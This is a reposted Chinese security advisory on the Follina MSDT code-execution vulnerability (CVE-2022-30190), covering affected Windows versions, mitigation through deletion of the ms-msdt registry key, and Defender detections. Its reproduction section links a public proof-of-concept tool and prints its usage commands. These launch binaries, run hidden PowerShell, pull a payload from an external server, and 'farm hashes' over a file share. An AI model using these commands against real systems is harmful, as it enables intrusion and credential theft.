Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)

admin 2022年6月2日00:22:15评论100 views字数 3977阅读13分15秒阅读模式
1 漏洞介绍

微软支持诊断工具(MSDT,Microsoft Support Diagnostic Tool)是一种实用程序,用于排除故障并收集诊断数据,供专业人员分析和解决问题。Microsoft Office是由微软公司开发的一款常用办公软件。
2022年5月30日,微软公司发布了Microsoft MSDT远程代码执行漏洞的紧急安全公告。未经身份验证的攻击者利用该漏洞,诱使用户直接访问或者预览恶意的Office文档,通过恶意Office文档中的远程模板功能,从服务器获取包含恶意代码的HTML文件并执行,从而实现以当前用户权限下的任意代码执行攻击。该漏洞已知触发需要用户对恶意Office文档进行直接访问,或者在资源管理器中通过预览选项卡对RTF格式的恶意文档进行预览。

Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)


2 影响范围
Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Coreinstallation)Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 for x64-based Systems Service Pack 2 (Server Coreinstallation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Coreinstallation)Windows Server 2008 for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 Azure Edition Core HotpatchWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

3 漏洞复现
工具下载:
https://github.com/chvancooten/follina.py
使用方法:
# Execute a local binarypython .follina.py -m binary -b windowssystem32calc.exe
# Execute a binary from a file share (can be used to farm hashes 👀)python .follina.py -m binary -b \localhostc$windowssystem32calc.exe
# Execute an arbitrary powershell commandpython .follina.py -m command -c "Start-Process c:windowssystem32cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:userspublicowned.txt'"
# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.htmlpython .follina.py -m binary -b windowssystem32calc.exe -u 1.2.3.4
# Only run the webserver on localhost, on port 8080 instead of 80python .follina.py -m binary -b windowssystem32calc.exe -H 127.0.0.1 -P 8080
复现截图:

Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)


4 修复建议
目前微软官方暂未发布此漏洞的补丁,但微软安全响应中心已经发布了此漏洞的指南,受影响用户可以应用以下临时缓解措施:
禁用MSDT URL协议
禁用 MSDT URL 协议可防止故障排除程序作为链接启动,包括整个操作系统的链接。仍然可以使用“获取帮助”应用程序和系统设置中的其他或附加故障排除程序来访问故障排除程序。请按照以下步骤禁用:
1.以管理员身份运行命令提示符。
2.要备份注册表项,请执行命令“reg exportHKEY_CLASSES_ROOTms-msdt filename“。
3.执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”。
撤销
1.以管理员身份运行命令提示符。
2.要恢复备份注册表项,请执行命令“reg import filename”。
此外,Microsoft Defender 防病毒软件使用检测版本1.367.719.0或更高版本为可能的漏洞利用提供检测和保护;Microsoft Defender for Endpoint 为客户提供检测和警报;Microsoft365 Defender 门户中的以下警报标题可以指示网络上的威胁活动:
  • Office 应用程序的可疑行为
  • Msdt.exe 的可疑行为
参考链接:
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
注意:研究人员将检测到在野利用的0 day漏洞标识为Microsoft Office 代码执行0 day漏洞(称为“Follina”),该漏洞影响了Office 2016 和 Office 2021等。本通告主要参考微软官方公告Microsoft Windows支持诊断工具 (MSDT) 任意代码执行漏洞。

5 参考文章
https://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868136&idx=1&sn=5261ed6d101f8ebf3ebd20be1f5fe625https://mp.weixin.qq.com/s?__biz=MzUxMDQzNTMyNg==&mid=2247499910&idx=2&sn=639a28e6435906dcd5637dbd096ea6a9https://mp.weixin.qq.com/s?__biz=MzU3ODM2NTg2Mg==&mid=2247491690&idx=1&sn=2fec31352971ca5091fc834c7a0342eb

原文始发于微信公众号(Reset安全):Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月2日00:22:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)https://cn-sec.com/archives/1072754.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息